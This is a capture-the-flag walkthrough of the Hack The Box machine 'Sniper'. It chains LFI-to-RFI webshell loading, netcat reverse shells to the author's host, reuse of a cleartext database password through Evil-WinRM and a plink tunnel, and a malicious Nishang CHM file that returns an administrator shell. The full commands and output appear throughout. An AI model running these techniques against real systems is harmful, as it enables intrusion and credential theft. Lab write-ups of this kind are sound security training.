Quick Summary
→ Sniper is another windows machine that you can access in unintended method.
The PHP Web Application was supposed to be vulnerable into LFI or Local File Inclusion to RFI or Remote File Inclusion.
Since this is a windows box I setup a samba share using the RFI method and I injecting my webshell and upload my executable file to get a reverse shell from my Kali Linux machine.
Doing some Reconnaisance I see a file which has to be related to user credentials that need to convert into a plain text then execute it with the executable file i uploaded.
The machine creator was leave a notes.txt on use file directory which is good enough as hint. Creating a malicious payload from my host using Powershell was not easy as my Windows always reject it and cannot load the script file but then I managed to create a malicious CHM file and get the Administrator.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service
→ Enumerate the SMB at port 445
→ Bruteforce the Web page directories
Post - Exploitation
→ Enumerate the page with Local File Inclusion
→ Setup SAMBA SHARE and upload a webshell
→ Using the access checked provided by the Microsoft to check the access rights of account "Chris"
→ Retrieve user credentials from Web page directories in inetpub
Exploitation
→ Method #1:
Look at listening port that can use to Port Forwarding and Login as Chris using Evil-WinRM
→ Method #2:
Convert the password hash into plaintext with Powershell and execute the nc.exe to get Reverse shell
→ Finally got the user.txt
Privilege Escalation
→ Enumerate file directories
→ Looking at notes.txt that give us hint.
→ Create a malicious file in Powershell with Out-CHM.ps1 from Nishang
→ Transfer to the Sniper machine in C:\Docs directories where the Administrator checked and open it.
→ Setup netcat listener and
→ Gain the Administrator shell
Network Scanning
Walkthrough
→ First, I run the NMAP to scan the target and get information about the various services that are running on the target machine. I use
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to —script=default
- -T 0-5 ⇒ Set timing template - higher is faster (less accurate)
- -p- ⇒ Scan all 65535 ports
- -oN ⇒ to save our scan results to a text file
nmap -sV -sC -T4 -p- 10.10.10.151 -oN nmap-Sniper
|
root in htb/boxes/Sniper
❯ nmap -sV -sC -T4 -p- 10.10.10.151 -oN nmap-Sniper
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-26 23:52 PST
Nmap scan report for 10.10.10.151
Host is up (0.22s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49667/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h02m31s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-26T23:03:52
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 562.35 seconds
root in htb/boxes/Sniper took 9m22s
❯
|
Nmap results
So there’s port open.
- 80 ⇒ which basically hosted a Web page
- 135 ⇒ running as Windows RPC
- 139 ⇒ running on Windows Microsoft netbios-ssn
- 445 ⇒ which is a default port on SMB
- 49667 ⇒ running as Windows RPC too
Enumeration
The first thing I did is connect to machine with smbclient at port 445 and try anonymous login but it seems’ I am not allowed to do that.
root in htb/boxes/Sniper
❯ smbclient -L 10.10.10.151 -U ""
Enter WORKGROUP\'s password:
session setup failed: NT_STATUS_LOGON_FAILURE
root in htb/boxes/Sniper took 3s
❯
|
Next, I use enum4linux – A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts but not working too.
root in htb/boxes/Sniper
❯ enum4linux -o -U -G -S -P 10.10.10.151
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 28 03:56:55 2020
==========================
| Target Information |
==========================
Target ........... 10.10.10.151
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.10.151 |
====================================================
[E] Can't find workgroup/domain
=====================================
| Session Check on 10.10.10.151 |
=====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
root in htb/boxes/Sniper took 11s
❯
|
Scan Web page directories
So I will leave enumerating this machine for a while and try to enumerate what’s on the Web page. I use dirsearch Web path scanner if i can get any usefull stuffs so
root in ~/htb/vpn
❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.151/" -e php,txt -x 301,302,403,404 --simple-report=sniper-directories
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 10 | Wordlist size: 6417
Error Log: /opt/dirsearch/logs/errors-20-03-28_02-20-51.log
Target: http://10.10.10.151/
[02:20:51] Starting:
[02:22:59] 200 - 3KB - /index.php
[02:22:59] 200 - 3KB - /INDEX.PHP
[02:22:59] 200 - 3KB - /index.PHP
[02:22:59] 200 - 3KB - /index.php/login/
[02:24:19] 200 - 5KB - /user/login.php
Task Completed
root in ~/htb/vpn took 3m38s
❯
|
Sniper Web Page
so there is login page which caught my attention at /user/login.php
I tried to input admin:admin for username and password and it redirects me into Under Construction Page.
I realized that this page is just a rabbit hole, can’t find any hints in the page source, so I try enumerate the whole page of sniper in http://10.10.10.151
Post - Exploitation
LFI | Local File Inclusion
After several enumeration in the web page’ I found interesting section at Services there’s a link there that you can use to change the language but what more interesting, it’s not like the other website that you can right click -> and change/translate the language. there’s a PHP File is assign to pick language for you.
when I try to inject a single ' in lang=blog-en.php it turn something like this’ seems to be it is vulnerable to LFI or Local File Inclusion attack
To confirm that this website is vulnerable to LFI I put this parameter at "lang=" ⇒ \windows\system32\drivers\etc\hosts
looking at at view page source we will see about the hosts file.
RFI | Remote File Inclusion
So I search on Google about LFI to RFI article and that one is pretty good. It help me to inject a webshell and get in to the machine.
I setup my SAMBA SHARE based on the article with this configuration at /etc/samba/smb.conf
[global]
workgroup = WORKGROUP
server string - Samba Server %v
netbios name = Payas0
security = user
map to guest = bad user
name to resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[medz]
path = /root/htb/boxes/Sniper/
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
|
Now everything looks fine i restart my samba share and do the RFI method.
To take control the web I use Winter WebShell so I can upload my payload and execute a revershell, so i will now put my IP address at lang=\\10.10.14.216\medz\shell.php then make a custom directory at C:
Create folder named – payas0
Looks good ! then i will upload nc.exe at C:\payas0
Now everything is set i will execute nc.exe with my IP and Port at 9001 and popup Powershell
# powershell
C:\payas0\nc.exe 10.10.14.216 9001 -e powershell.exe
|
after executing this I have an initial shell ;)
# powershell
root in htb/boxes/Sniper via 🐘 v7.3.15
❯ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.216] from (UNKNOWN) [10.10.10.151] 50340
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\payas0> whoami
whoami
nt authority\iusr
PS C:\payas0> hostname
hostname
Sniper
PS C:\payas0>
|
Enumerating SNIPER machine
I start another enumeration, so first thing I did is to look who’s user inside with powershell command Get-WmiObject -Class Win32_UserAccount so:
# powershell
PS C:\payas0> Get-WmiObject -Class Win32_UserAccount
Get-WmiObject -Class Win32_UserAccount
AccountType : 512
Caption : SNIPER\Administrator
Domain : SNIPER
SID : S-1-5-21-3952461944-2550723483-3555184078-500
FullName :
Name : Administrator
AccountType : 512
Caption : SNIPER\Chris
Domain : SNIPER
SID : S-1-5-21-3952461944-2550723483-3555184078-1000
FullName :
Name : Chris
AccountType : 512
Caption : SNIPER\DefaultAccount
Domain : SNIPER
SID : S-1-5-21-3952461944-2550723483-3555184078-503
FullName :
Name : DefaultAccount
AccountType : 512
Caption : SNIPER\Guest
Domain : SNIPER
SID : S-1-5-21-3952461944-2550723483-3555184078-501
FullName :
Name : Guest
AccountType : 512
Caption : SNIPER\WDAGUtilityAccount
Domain : SNIPER
SID : S-1-5-21-3952461944-2550723483-3555184078-504
FullName :
Name : WDAGUtilityAccount
PS C:\payas0>
|
So I’ve got USER named – Chris and I try to checked the access right of that account with Access checked so
# powershell
PS C:\accesschk.exe -uwqs Users C:\*.* /accepteula
c:\payas0\accesschk.exe -uwqs Users C:\*.* /accepteula
Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com
RW C:\$Recycle.Bin
RW C:\Microsoft
RW C:\payas0
RW C:\ProgramData
RW C:\Temp
RW C:\Microsoft\Windows
RW C:\Microsoft\Windows\Powershell
RW C:\payas0\Microsoft
RW C:\payas0\Microsoft\Windows
RW C:\payas0\Microsoft\Windows\Powershell
RW C:\ProgramData\Data
RW C:\ProgramData\MySQL
RW C:\ProgramData\USOShared
RW C:\ProgramData\VMWare
RW C:\ProgramData\Data\#innodb_temp
RW C:\ProgramData\Data\mysql
RW C:\ProgramData\Data\
RW C:\ProgramData\Data\perfomance_schema
RW C:\ProgramData\Data\sniper
RW C:\ProgramData\Data\sys
RW C:\ProgramData\Microsoft\DeviceSync
RW C:\ProgramData\Microsoft\User Account Pictures
RW C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys
RW C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys
RW C:\ProgramData\Microsoft\DRM\Server
RW C:\ProgramData\Microsoft\NetFramework\Breadcrumbstore
RW C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache
RW C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\downloads
RW C:\ProgramData\Microsoft\WinMSIPC\Server
|
Second I visit the inetpub directory where the website is installed and the source code. and I’m lucky i see interesting file at C:\inetpub\wwwroot\user\db.php which contain user credentials.
The DB connection String was found at the db.php was confirmed that the creds is owned by user Chris
Exploitation
Privilege Escalation for user CHRIS
Method #1
I was thinking if I can use that creds in Evil-WinRM protocol (netstat -ano) and get the user.txt
We can use port 5985 to create the Port Forwarding method and login as Chris but before i do that I uploaded plink.exe windows binary to Sniper and create a tunnel so I can access that port from my machine so:
PS C:\payas0> .\plink.exe -l nulldev -pw nulldev -R 5985:127.0.0.1:5985 10.10.14.216
.\plink.exe -l nulldev -pw nulldev -R 5985:127.0.0.1:5985 10.10.14.216
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 81:c9:32:5d:2e:03:3c:1d:72:8a:54:45:ed:0b:08:4b
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Linux Payas0 5.4.0-kali2-amd64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 28 05:30:42 2020 from 10.10.10.151
Could not chdir to home directory /home/nulldev: No such file or directory
$ whoami
whoami
nulldev
$ su root
Password: "------------"
nulldev on Payas0
❯
|
Now that the tunnel is created, I will try to login as user Chris using dbuser password and get the user.txt
# powershell
nulldev on Payas0 in evil-winrm on master via 💎 v2.5.7
❯ ruby evil-winrm.rb -i 127.0.0.1 -u Chris -p '36mEAhz/B8xQ~2VM' -s ./ -e ./
ruby evil-winrm.rb -i 127.0.0.1 -u Chris -p '36mEAhz/B8xQ~2VM' -s ./ -e ./
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chris\Documents> cd ..
*Evil-WinRM* PS C:\Users> dir
dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/9/2019 6:47 AM Administrator
d----- 4/11/2019 7:04 AM Chris
d-r--- 4/9/2019 6:47 AM Public
*Evil-WinRM* PS C:\Users> cd Chris\Desktop
cd Chris\Desktop
*Evil-WinRM* PS C:\Users\Chris\Desktop> dir
dir
Directory: C:\Users\Chris\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:15 AM 32 user.txt
*Evil-WinRM* PS C:\Users\Chris\Desktop> more user.txt
more user.txt
21f4[----------------------]cf56e
*Evil-WinRM* PS C:\Users\Chris\Desktop>
|
Method #2
Yes there’s a method #2 to get user.txt and this is less hassle than doing port forwarding with powershell but first I will give permission my payas0 folder then setup netcat listener in my Kali nc -lnvp 4444 so:
# powershell
PS C:\inetpub\wwwroot\user> icacls "C:\payas0" /grant iusr:F
icacls "C:\payas0" /grant iusr:F
processed file: C:\payas0
Successfully processed 1 files; Failed processing 0 files
|
then do script.
# powershell
$user = "SNIPER\\Chris"
$password = "36mEAhz/B8xQ~2VM"
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
Invoke-Command -ComputerName SNIPER -Credential $credential -ScriptBlock { C:\payas0\nc.exe -e cmd.exe 10.10.14.216 4444}
|
After executing the last command I have now again the shell (2nd shell) and this was look better.
# powershell
root in htb/boxes/Sniper via 🐘 v7.3.15
❯ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.216] from (UNKNOWN) [10.10.10.151] 49835
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Chris\Documents>whoami & hostname
whoami & hostname
sniper\chris
Sniper
C:\Users\Chris\Documents>
|
Privilege Escalation
Enumeration begins again’ but this was pretty easy as the the stuffs I needed is all in the basic folder directories.
Going at C:\Docs directory there’s a note.txt leave by our “Boss” says.
# powershell
C:\Users\Chris\Desktop>cd \Docs
cd \Docs
C:\Docs>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Docs
03/28/2020 12:46 AM <DIR> .
03/28/2020 12:46 AM <DIR> ..
04/11/2019 09:31 AM 285 note.txt
04/11/2019 09:17 AM 552,607 php for dummies-trial.pdf
2 File(s) 552,892 bytes
2 Dir(s) 17,953,026,048 bytes free
|
Note.txt
What’s on the note.txt ? Well this:
# powershell
C:\Docs>more note.txt
more note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
C:\Docs>
|
So hints is on the note ⇒ "The documentaion for the new app, then I will drop it here when I'm done with it." So there’s a file here here which the Administrator will checked and open it.
CHM File
Next, in the C:\Users\Chris\Downloads directory there’s a CHM file.
# powershell
C:\Docs>cd \Users\Chris\Downloads
cd \Users\Chris\Downloads
C:\Users\Chris\Downloads\dir
dir
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Users\Chris\Downloads
03/27/2020 11:46 PM <DIR> .
03/27/2020 11:46 PM <DIR> ..
03/27/2020 11:46 PM 281 a.html
04/11/2019 08:36 AM 10,462 instructions.chm
2 File(s) 10,743 bytes
2 Dir(s) 17,945,899,008 bytes free
C:\Users\Chris\Downloads>
|
Generate Malicious CHM File
To view the chm file, you need to open it with Windows, so I transferred the chm file to my Windows machine, and it is
precisely the documentation for the app, requested by the Sniper CEO:
Administrator will checked CHM and open it then the payload will triggered.
This one is new to me I have never had anything to do with CHM files’ so I did some research about CHM File and I found that you can create a malicious CHM File with Nishang and use the Out-CHM.ps1.
I try to download first the Out-CHM.ps1 in my Windows but it rejected because it is considered as a virus’. Well creating a malicious CHM File was fuck me’ as my Windows always deny it even i disable my windows security for a while, Powershell will always reject it.
# powershell
PS C:\Users\Medz\Documents\sniper> import-module Out-CHM.ps1
..\Out-CHM.ps1 : The term 'Out-CHM.ps1' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ ..\Out-CHM.ps1
+ ~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Out-CHM.ps1:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
PS C:\Users\Medz\Documents\sniper>
|
but I managed it too using powershell -ep bypass
# powershell
PS C:\Users\Medz\Documents\sniper> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https:
PS C:\Users\Medz\Documents\sniper>
|
Now before generate a CHM file we need to download this first HTML Help Workshop from Microsoft and choose htmlhelp.exe (run/install it). This will create the folder C:\Program Files (x86)\HTML Help
Workshop with the needed programs to create the malicious .chm file.
and Finally, I can now create CHM file.
# powershell
PS C:\Users\Medz\Documents\sniper> import-module .\Out-CHM.ps1
PS C:\Users\Medz\Documents\sniper> Out-CHM -Payload "C:\payas0\nc.exe 10.10.14.216 1234 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702
Compiling c:\Users\Medz\Documents\sniper\doc.chm
Compile time: 0 minutes, 0 seconds
2 Topics
4 Local links
4 Internet links
0 Graphics
Created c:\Users\Medz\Documents\sniper\doc.chm, 13,448 bytes
Compression increased file by 280 bytes.
PS C:\Users\Medz\Documents\sniper> dir
Directory: C:\Users\Medz\Documents\sniper
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/30/2019 10:58 PM Basic Linux Privilege Escalation_files
-a---- 6/30/2019 10:58 PM 56717 Basic Linux Privilege Escalation.html
-a---- 3/29/2020 3:20 AM 13448 doc.chm
-a---- 3/29/2020 3:05 AM 19502 Out-CHM.ps1
PS C:\Users\Medz\Documents\sniper>
|
Gain the Administrator Shell
So it’s done ! Now I will upload doc.chm in C:\Docs directory of SNIPER machine.
# powershell
C:\Docs>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Docs
03/28/2020 07:19 PM <DIR> .
03/28/2020 07:19 PM <DIR> ..
04/11/2019 09:31 AM 285 note.txt
04/11/2019 09:17 AM 552,607 php for dummies-trial.pdf
2 File(s) 552,892 bytes
2 Dir(s) 17,987,465,216 bytes free
C:\Docs>copy \\10.10.15.33\medz\doc.chm .
copy \\10.10.15.33\medz\doc.chm .
1 file(s) copied.
C:\Docs>
|
Once we put the doc.chm file in Docs I simply setup netcat listener with my port i generated in malicious chm file. Now all i need to do is to wait the Administrator to checked and open it.
Root
After 2-3 minutes I have the administrator shell ! Very nice box !
# bash
root in htb/boxes/Sniper via 🐘 v7.3.15
❯ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.15.33] from (UNKNOWN) [10.10.10.151] 49703
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami & hostname
whoami & hostname
sniper\administrator
Sniper
C:\Windows\system32>
|
Get the root.txt
# bash
C:\Windows\system32>cd \Users\Administrator
cd \Users\Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Users\Administrator
04/09/2019 06:47 AM <DIR> .
04/09/2019 06:47 AM <DIR> ..
08/14/2019 10:38 PM <DIR> 3D Objects
08/14/2019 10:38 PM <DIR> Contacts
10/01/2019 08:44 AM <DIR> Desktop
08/14/2019 10:38 PM <DIR> Documents
08/14/2019 10:38 PM <DIR> Downloads
08/14/2019 10:38 PM <DIR> Favorites
08/14/2019 10:38 PM <DIR> Links
08/14/2019 10:38 PM <DIR> Music
08/14/2019 10:38 PM <DIR> Pictures
08/14/2019 10:38 PM <DIR> Saved Games
08/14/2019 10:38 PM <DIR> Searches
08/14/2019 10:38 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 17,986,367,488 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Users\Administrator\Desktop
10/01/2019 08:44 AM <DIR> .
10/01/2019 08:44 AM <DIR> ..
04/11/2019 08:13 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 17,986,367,488 bytes free
C:\Users\Administrator\Desktop>more root.txt
more root.txt
5624c[-------------------]436c15
C:\Users\Administrator\Desktop>
|
If you liked my writeup please leave a respect on my Profile
Referrences:
LFI to RFI
WebShell for Windows
Access Privilege Checked
HTML Workshop
Nishang - Out-CHM